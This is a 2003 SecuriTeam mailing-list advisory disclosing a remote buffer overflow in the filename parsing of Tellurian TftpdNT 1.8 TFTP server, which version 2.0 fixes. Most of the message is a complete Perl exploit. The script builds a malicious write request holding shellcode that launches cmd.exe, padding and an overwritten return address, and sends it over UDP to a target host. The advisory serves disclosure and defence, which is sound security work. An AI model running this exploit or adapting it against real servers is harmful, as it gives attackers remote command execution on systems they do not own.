Date: Mon, 1 Sep 2003 14:32:36 +0300
From: Aviram Jenik <[email protected]>
To: [email protected]Subject: Security Vulnerability in Tellurian TftpdNT (Long Filename)
Security Vulnerability in Tellurian TftpdNT (Long Filename)
=2D-----------------------------------------------------------------------=
=20
=20
Article reference:=20
http://www.securiteam.com/windowsntfocus/5RP0M1PAUM.html
=20
SUMMARY
Tellurian TftpdNT (http://www.tellurian.com.au/) is a TFTP server for Windo=
ws=20
NT and Windows 9x.=20
A buffer overflow vulnerability in the product allows remote attackers to=20
cause the product to overflow an internal buffer, while executing arbitrary=
=20
code.=20
DETAILS
Vulnerable systems:=20
=A0* TftpdNT version 1.8=20
=20
Immune systems:=20
=A0* TftpdNT version 2.0=20
=20
It is possible to cause a buffer overflow in the Tellurian TftpdNT product=
,=20
while overwriting the EIP pointer - this allows remote command execution.=20
The overflow occurs in the product's parsing of the filename.=20
=20
Vendor status:=20
The vendor has been informed, and has fixed the issue within 24 hours. A n=
ew=20
version is available on the web site.=20
=20
Exploit:=20
#!/usr/bin/perl -w=20
#Tellurian TFTP Server buffer overflow vulnerability=20
=20
use IO::Socket;=20
$host =3D "192.168.1.44";=20
$port =3D "69";=20
=20
$shellcode =3D "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\=20
\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\=20
\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\=20
\x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F";=20
=20
$buf =3D "\x00\x02";=20
$buf .=3D "\x41"x(508-length($shellcode));=20
$buf .=3D $shellcode;=20
$buf .=3D "\x0F\x02\xC7"; # EIP=20
$buf .=3D "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";=20
=20
print "Length: ", length($buf), "\n";=20
=20
$socket =3D IO::Socket::INET->new(Proto =3D> "udp") or die "Socket error:=
=20
$@\n";=20
$ipaddr =3D inet_aton($host) || $host;=20
$portaddr =3D sockaddr_in($port, $ipaddr);=20
send($socket, $buf, 0, $portaddr) =3D=3D length($buf) or die "Can't send: =
$!\n";=20
print "Done\n";=20
=20
SecurITeam would like to thank STORM ([email protected]) for finding thi=
s=20
vulnerability.=20
=2D-=20
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.comhttp://www.SecuriTeam.com
Know that you're safe:
http://www.AutomatedScanning.com
